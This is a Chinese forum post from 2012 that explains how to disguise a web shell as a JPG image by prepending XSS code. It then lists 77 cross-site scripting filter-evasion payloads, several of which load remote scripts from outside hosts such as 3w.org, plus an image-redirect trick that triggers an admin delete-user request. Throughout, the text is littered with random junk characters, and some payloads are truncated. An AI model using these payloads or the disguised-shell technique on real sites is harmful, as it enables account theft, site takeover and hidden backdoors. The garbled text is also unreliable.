跨站图片shell
! } o3 t1 X* D# k+ {2 AXSS跨站代码 <script>alert("")</script>" E$ n" q2 i# S% g) W! g T
' d' [# {! o2 E
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
7 {+ _1 j% a s: l! p* b% ~' E8 F* `0 E- x# i9 a6 f$ Z- y0 o; ^
- E! m9 |( A: H# D) H
. ^0 z+ ^7 u: B. A! ^" s Q1)普通的XSS JavaScript注入% m. H4 v$ I( ]4 y i
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>7 J( s5 n; D3 |* F% B
. K1 A( u% F* ?1 K(2)IMG标签XSS使用JavaScript命令
9 J' ]/ L" n+ [3 S# x/ r<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>. n9 N$ ]& F' N* H0 W
5 A5 o6 i9 ^* y, P, ^(3)IMG标签无分号无引号1 `7 a5 a/ v+ t' W& K8 o# X! P
<IMG SRC=javascript:alert(‘XSS’)>
) W) V) X+ y G9 e
; }8 A" }$ e! V/ i; g- W" ^(4)IMG标签大小写不敏感
& a4 ?4 x5 u- l/ E( k& [4 l) V<IMG SRC=JaVaScRiPt:alert(‘XSS’)>8 m7 W' d' @6 d" f+ R# Z6 k% v2 b
9 t! n0 c) F# L" ~6 x' a4 j
(5)HTML编码(必须有分号)
" ~, P, e) m+ J- a" _<IMG SRC=javascript:alert(“XSS”)>
. ]4 \% U. u9 P: j' R, a+ ^; \2 B) g, d; [2 i" t
(6)修正缺陷IMG标签
* D$ @; ~3 {4 M$ F# Y<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>4 G7 t/ h. t% Z1 \! o9 F" X+ r
8 [2 S, m; k: K2 p, `
(7)formCharCode标签(计算器)
: |$ n9 r3 b) w+ f6 W' a<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>8 h% D2 k& Y6 T) P/ M2 S# a" ~, N
& l8 G1 v/ C. K$ o. ?
(8)UTF-8的Unicode编码(计算器)
% e4 W9 Y* Q' a/ p6 |<IMG SRC=jav..省略..S')>
7 P* \3 v1 Y, o7 F( [, s# t" E! D3 O% D, H$ R6 T
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
, b6 q# S+ D! b1 K* u4 {% I' P<IMG SRC=jav..省略..S')>
# n. [1 |, Y* N$ Y, @! N
/ Q+ }* u9 y' e& U, E& y(10)十六进制编码也是没有分号(计算器)
+ B% i$ U" h+ p; h5 L<IMG SRC=java..省略..XSS')>- w" L1 X# k' v7 h3 H. d
8 d E# ?- V: T; D" u+ ~(11)嵌入式标签,将Javascript分开
/ D) n2 w& }; I1 o<IMG SRC=”jav ascript:alert(‘XSS’);”>1 [+ s$ ^( R% N* o' h' [; Z
B# ]1 f, J3 j& ^; h(12)嵌入式编码标签,将Javascript分开, Y% `3 F! c" j9 `' ]
<IMG SRC=”jav ascript:alert(‘XSS’);”>
* {. c6 |. w. ? p/ @: V. s. t6 k0 ?( n5 `; b+ {
(13)嵌入式换行符5 s$ G% `! Q! G- ]( i
<IMG SRC=”jav ascript:alert(‘XSS’);”>9 {9 z/ \- K# P
" U* D; q0 \9 H" T4 e$ D" N+ X# l(14)嵌入式回车% n8 Q2 c: X3 f+ `( k5 U: _
<IMG SRC=”jav ascript:alert(‘XSS’);”>! s* {: S$ r+ ?0 W8 Z- `8 }4 R
' c( z# ~0 i! K$ r9 y. ]* `: |) c
(15)嵌入式多行注入JavaScript,这是XSS极端的例子2 {9 J8 v0 s9 L! y f5 C
<IMG SRC=”javascript:alert(‘XSS‘)”>
/ M- q# {# O8 n1 ]" y
# q5 D1 V2 G3 V* b(16)解决限制字符(要求同页面)
$ _, ~( K* p6 K6 A+ p6 M% L+ p<script>z=’document.’</script>4 F: x; R2 ?# k7 A( v( ^
<script>z=z+’write(“‘</script>
1 D/ M6 ]; X0 F* E0 N<script>z=z+’<script’</script>" q3 S: j9 x1 L! `
<script>z=z+’ src=ht’</script>
$ @' |2 K, N8 W6 U<script>z=z+’tp://ww’</script>: X2 p, p9 W6 q1 X8 c3 W1 ~5 E
<script>z=z+’w.shell’</script>
+ }$ T5 p# K$ Q3 u# c<script>z=z+’.net/1.’</script>1 E4 l3 q9 r) D0 ]
<script>z=z+’js></sc’</script>: ~( d( l' O. D! i; ] V0 `
<script>z=z+’ript>”)’</script>
% a. @: [# c+ N, H: P, c8 w<script>eval_r(z)</script>& t$ P3 \- u" @. J1 v" W
6 F/ ]" ]% c) J9 `. F
(17)空字符% L* ~1 d1 F" R5 w% o2 ?% H
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
7 I; c* R+ I; h3 }1 u$ f5 h( d$ P9 \& n9 U
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用. `7 U: S/ V" q. H1 i. `( L1 g
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out6 Q) A' S7 ], q$ S9 o
: B1 Z, z i; [- `; b5 ^8 H- {
(19)Spaces和meta前的IMG标签6 S& A+ H' b, j8 U( W9 I* ?
<IMG SRC=” javascript:alert(‘XSS’);”>2 a/ q7 [5 k0 f. T2 r# n2 Q2 j9 r
$ `, E7 N3 C( R9 G7 U. C5 c8 B0 B
(20)Non-alpha-non-digit XSS+ W [* g M6 V' \, t8 j
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
- H& f# I6 J' M7 F& A7 d5 G5 i$ _. t j% {* }: I% H+ n, O% i
(21)Non-alpha-non-digit XSS to 2$ K4 u; G: n" |/ k8 v2 e' R7 s
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>3 W; _" _. c1 s. o; n" T
, ^# Z; ?, m' T- S(22)Non-alpha-non-digit XSS to 3; D1 w7 b# u; g6 y! l
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
5 v/ c% M: q8 i; G3 u. O$ E' j; r( P J/ I) e! z* D4 b2 {1 N! e
(23)双开括号+ v8 A$ f& u! @% n9 T
<<SCRIPT>alert(“XSS”);//<</SCRIPT>, j4 m* {) ~0 }" Z7 V) c5 \
3 [+ A9 I z& Z# ^: N3 \
(24)无结束脚本标记(仅火狐等浏览器)8 C9 i* u- {6 T, D1 A
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
/ @# d8 t) i5 l6 z# P9 Y& {
7 n0 \) `. k1 f4 X, V: h4 V; j(25)无结束脚本标记2
* n( a0 s3 Q; n9 z* u<SCRIPT SRC=//3w.org/XSS/xss.js>) H% k3 o% Z6 t" p+ m: _
- D4 g6 l& I1 M) P& n( _(26)半开的HTML/JavaScript XSS- @; M' w2 ]7 V# N2 w5 l
<IMG SRC=”javascript:alert(‘XSS’)”
: ?. X* g Q7 z- }& C5 {$ ^; j, c
? y) o3 S4 O(27)双开角括号% J' I+ c; J9 r* F1 {
<iframe src=http://3w.org/XSS.html <. T+ B V: R( y! d7 T( T
; X. o; [% _( q- b
(28)无单引号 双引号 分号+ c4 C" V* y; z2 R- K5 \
<SCRIPT>a=/XSS/! ~$ t" k4 n9 e$ Y
alert(a.source)</SCRIPT>
9 y* Z* z, V; K/ K, F8 {! @; j8 p( G6 _; |: L3 D( j" K
(29)换码过滤的JavaScript; @1 F7 j6 O/ N, U
\”;alert(‘XSS’);//& [9 o5 A$ v( |* p* D
# v& V: q2 o1 W- k* {1 ]
(30)结束Title标签/ s! A( |' J X0 j3 }/ s( R3 u
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>( R" o+ K. i7 ^2 g' C# a" `
. v) J" w2 K! I/ g/ F
(31)Input Image. }1 Y9 d% Q, m1 K
<INPUT SRC=”javascript:alert(‘XSS’);”>
7 c+ c5 D" `) G$ i& x; b* M6 ^0 r3 ]2 x: r2 Z+ ]
(32)BODY Image4 q4 W+ a% j& Z7 r i
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>) k3 ?5 q0 x9 c4 i+ s
/ \/ q- W3 n" @) f2 [(33)BODY标签
/ t2 _# C/ ]9 L7 |<BODY(‘XSS’)>
! X4 S0 L {% k; v8 {
8 g: _9 ^2 }5 n. H9 K(34)IMG Dynsrc
% C! e) B. E+ m9 h& R<IMG DYNSRC=”javascript:alert(‘XSS’)”>9 H3 V. y2 v$ U
# A* S7 W6 C, I% \0 Z/ u
(35)IMG Lowsrc
* C8 [; s! |2 p. X# P! Y<IMG LOWSRC=”javascript:alert(‘XSS’)”>0 k9 C3 |: z5 J" F0 x, ], W7 W
& O8 p- e' x0 \# \(36)BGSOUND
7 ]) X$ w* T# {3 p6 R% v<BGSOUND SRC=”javascript:alert(‘XSS’);”>: E" a+ D& Q* k" k
: X: u0 l5 \8 z* u. W(37)STYLE sheet8 k% B; z2 U7 k8 E
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>3 u* [: v$ q: S V* o( Y8 q- K: V3 a
$ R4 ?( D7 S3 p(38)远程样式表! L2 p9 g: X* R8 _
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
. ^9 x) Q* E+ ~; \8 w/ c9 y, {1 G. c8 C0 O
(39)List-style-image(列表式)
f3 r! ~; c. O, J+ _3 |- R<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
& a" r- l* y3 b# {* E, v2 ]! o6 Y: r, {( _
(40)IMG VBscript5 ?4 K& [ y& ~) Y: r( R
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
- O$ B b# y3 _4 _* I* I) p5 d/ k- c& D# j2 I& D! f! g2 H
(41)META链接url7 h; T6 {" C, X/ V
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
$ `0 d9 o5 v$ o6 _- A6 z6 ^
1 P+ T' \! ]/ R1 @) n(42)Iframe
* `7 l; p6 R g0 h0 `/ y<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- E* C5 p; P. g+ l" l(43)Frame( n! J, e" P7 i
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
& a% m% u3 ^ l% J* d9 v: M8 H
# b ^8 f) j5 k$ k" z' w3 N(44)Table1 n; `! o/ m5 T$ s1 E( @
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
7 G) N% j5 P6 w: \5 \* n4 c! X% P3 H1 b" Z* a7 E! H) \
(45)TD
2 c) S, _. a# Z' \0 ~0 S<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
) M6 G. S3 i% `! ?. |; c1 F; B: c, C' o% j
(46)DIV background-image" c0 m/ d" n; a. m, X% F7 ~* w
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
+ V. Z) v8 l5 x; l+ W" _' `) m# T9 i% U4 o/ p9 r9 y. V( w
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)1 i6 d2 q6 W, M6 |' q1 s
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
, n M J! |' Y& M g$ e8 i i- j* M) l c
(48)DIV expression
! P4 Z/ @' c$ Q! Z8 l3 r<DIV STYLE=”width: expression_r(alert(‘XSS’));”>$ U3 r9 F" ^4 t$ ]
/ z2 }6 A# a; G# O* D6 J
(49)STYLE属性分拆表达# g" O9 d( ~4 d* W
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>5 |. S5 B6 O6 Z
; d3 A+ L4 A7 N: }! t9 }9 H7 F(50)匿名STYLE(组成:开角号和一个字母开头)
! z% R* r6 N/ S- S8 L9 ?5 ~( b<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>: r4 |. m" Z" Y
9 b% L" b u$ ?- O(51)STYLE background-image
0 p: B0 \# w* G" r; |4 e( B<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>+ W" Q# n8 b" L% [! z# b
; S/ F8 C+ d: k% E7 h(52)IMG STYLE方式
0 f7 s0 Z2 \7 Gexppression(alert(“XSS”))’>! m8 @2 l a% O# ^ ?
) j' Z9 D$ o0 Z( W4 {! I! g(53)STYLE background6 U$ x/ Y! c) C+ R% `% y4 t0 W
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
; z+ s6 P$ P% B1 N: f$ u2 E0 {1 _4 V! c7 O1 o5 |
(54)BASE
5 k0 X. B+ `, | }. W: ^8 s0 \<BASE HREF=”javascript:alert(‘XSS’);//”>
% ~& T) d) e N, o0 x) w+ w- D6 k' ]
8 h# r; {" w b1 k(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
! m. M4 R8 I9 ?$ x, }! A6 J<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>/ `* u t7 F$ M: b; t
2 d! N; ]9 ^# Q [ |' e; H
(56)在flash中使用ActionScrpt可以混进你XSS的代码
3 G5 [: y8 X3 Q M7 ]2 Va=”get”;
' p, y3 f7 L2 ^" V* M& sb=”URL(\”";1 _& s. s+ r" D; t& f
c=”javascript:”;
6 z/ ]( e* h+ f7 Md=”alert(‘XSS’);\”)”;" x' t+ y4 ?+ ]5 B" ?
eval_r(a+b+c+d);2 `( F& h$ F% g
1 K$ M) `' }4 y+ y
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
4 ~9 ^( k2 ?( C o4 ~- S# P<HTML xmlns:xss>
) u5 }* w1 E: y<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
( _" H0 E* x, Y1 Z+ E<xss:xss>XSS</xss:xss>
# {7 Z! U1 g0 k* k4 e1 S! h. F3 A</HTML>4 I d7 L& |* i6 G F8 i
; ]- o0 R, h6 @+ e4 X* ?" v" L(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
, v* {8 a* `; |- T' F$ ~<SCRIPT SRC=””></SCRIPT>
6 y1 U( @1 w* ~0 j1 V) ]) s/ K: g, |- f6 ?$ y
(59)IMG嵌入式命令,可执行任意命令/ I8 c) Y+ Z- S* X( U0 z% s
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
8 e# c# L) v& y3 }; q G
- o6 K3 u6 H0 U1 u7 c- A% Y(60)IMG嵌入式命令(a.jpg在同服务器)# c$ `; U7 b7 g4 @
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
4 v. x, u: R) N& D+ }# @7 W
) B/ E$ b5 C8 z2 f& j(61)绕符号过滤
/ P! S" J7 p1 A% r1 m2 O<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>- P, y& D5 S& f8 p+ Z2 i
7 b1 D& t% |2 V- d(62)4 I% ?$ Z' z# `
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>! A7 D0 f* g' b8 b: ~7 F
$ h" g2 `6 K+ j* k' n3 m+ y
(63)
3 r$ W0 b( w9 k<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>; K6 n' }3 ^! Z( c7 F4 P6 W
* P- T2 ?7 @% a D2 e- Z
(64)$ C. `* K M2 g8 D3 p r
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT> ~' K; r. B, |/ q5 Z" b( R3 m
- V* R: \8 @- ~2 b, F
(65)
% q6 D& B3 M! W, J<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>6 d8 h: @: i+ A% ^& M7 f9 q
7 f8 w4 A0 H8 n& c
(66); v# ^; w& X6 p' s I
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>& q1 @! @& w( ]# J
$ ^; T( `# s+ u5 A; X
(67)
5 m. ~3 M" u p: O2 t3 B# K! L! |/ B<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>) C7 e* J7 M8 S& M
) n2 k- }# X! A' y(68)URL绕行5 B& ?1 H* H5 W
<A HREF=”http://127.0.0.1/”>XSS</A>7 X2 B' H* {% ]+ F
7 j; Q1 `* [% G# m, R8 V
(69)URL编码2 E4 d; }% e- t, V! M# ?
<A HREF=”http://3w.org”>XSS</A>: Z- C, _% M- m( }) I2 q
: U8 \/ x- F0 K* Y4 m
(70)IP十进制
- c+ F, E1 A h1 ?( c: d3 E<A HREF=”http://3232235521″>XSS</A>3 T0 O: H* d! O; ?4 `7 S, G
$ s/ {. T% ]# y( T
(71)IP十六进制1 h' R. n# g2 A* q) \
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>5 M/ Q2 v, |9 J( k
" |5 F. }1 X' q* h3 j# q: o(72)IP八进制
. q2 `: j. d: r' r( u<A HREF=”http://0300.0250.0000.0001″>XSS</A>6 H% o* p3 p$ p$ b, E9 K: @4 u% Q& c! E
" B9 T: C. h0 F, W3 m
(73)混合编码
/ {9 C) @1 @" K! O- p<A HREF=”h
( d8 z) V. @6 d. K9 Gtt p://6 6.000146.0×7.147/”">XSS</A>- f7 K- u( O" C( ?+ [2 h
, k5 C; F- s1 |0 K) h(74)节省[http:]. B) P* M, v0 ]' E3 G- s
<A HREF=”//www.google.com/”>XSS</A>
" j( B' u0 o1 c2 S- Q3 G7 H9 {# ^$ v2 W j" p1 V0 ?
(75)节省[www]
, R% {# Z1 s3 ^* ?% o9 l<A HREF=”http://google.com/”>XSS</A>3 c& c) k ]& p$ n" \8 \! D
# T% |9 b; B5 p5 h2 |% J5 W(76)绝对点绝对DNS a% y8 P8 t7 }4 v7 B. ]; Z4 d) Q
<A HREF=”http://www.google.com./”>XSS</A>$ Z# `- a) N( K: w
9 C7 j( [' A- X2 A3 Z( N `
(77)javascript链接
5 ?9 W! c$ z! `- |: P9 R. W<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
0 b: b% k. @/ X. }* ?5 t* s9 o, ` |
发表于 2012-9-13 17:04:56
收藏
支持
反对